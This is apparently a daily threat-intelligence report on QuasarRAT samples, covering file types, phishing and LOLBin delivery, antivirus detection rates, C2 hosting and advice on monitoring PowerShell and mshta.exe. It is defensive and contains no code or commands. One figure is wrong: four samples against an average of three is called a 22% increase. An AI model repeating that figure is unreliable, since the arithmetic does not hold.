Daily Summary
Four new QuasarRAT samples were identified today, a 22% increase over the 7-day average of three. The trend is rising, with a notable shift towards script-based delivery mechanisms alongside traditional executables.
New Samples Detected
The new samples show a split between executable and script-based payloads. Two .exe files were accompanied by one PowerShell script (.ps1) and one HTML Application (.hta). The .exe samples continue to use generic, non-suspicious naming conventions, while the script files exhibit obfuscated code blocks, indicating an effort to bypass static analysis.
Distribution Methods
The file type distribution suggests a multi-pronged delivery approach. The .exe files are likely distributed via phishing emails with malicious attachments or compromised software installers. The presence of .ps1 and .hta files points to ongoing campaigns utilizing malicious Office documents or direct script execution, often facilitated by phishing lures that leverage living-off-the-land binaries (LOLBins) like PowerShell.
Detection Rate
Current detection rates for the new variants are moderate. The .exe files are flagged by approximately 65-70% of AV engines, while the obfuscated .ps1 and .hta scripts show a lower detection rate, around 40-50%. This indicates newer script-based variants may be successfully evading signature-based detection at initial deployment.
C2 Infrastructure
No new C2 servers were identified today. Recent infrastructure remains active, primarily hosted on compromised VPS providers with no distinct geographic concentration. This lack of new infrastructure may suggest actors are consolidating operations on existing, resilient servers.
7-Day Trend
Activity has been steady at a low baseline this week, with daily counts fluctuating between two and four samples. Today’s count represents the high end of that range, but does not yet indicate a significant surge in campaign volume.
Security Analysis
The consistent inclusion of script-based payloads (.ps1, .hta) alongside .exe files suggests actors are systematically testing and deploying multiple initial access vectors to find the path of least resistance. This is a shift from earlier, more .exe-heavy campaigns and mimics the flexible approach of commodity loaders like Emotet. A key defensive recommendation is to enhance monitoring and restrict execution for LOLBins, particularly PowerShell and mshta.exe, from unexpected parent processes like email clients or Office applications, focusing on command-line arguments that include obfuscated or encoded scripts.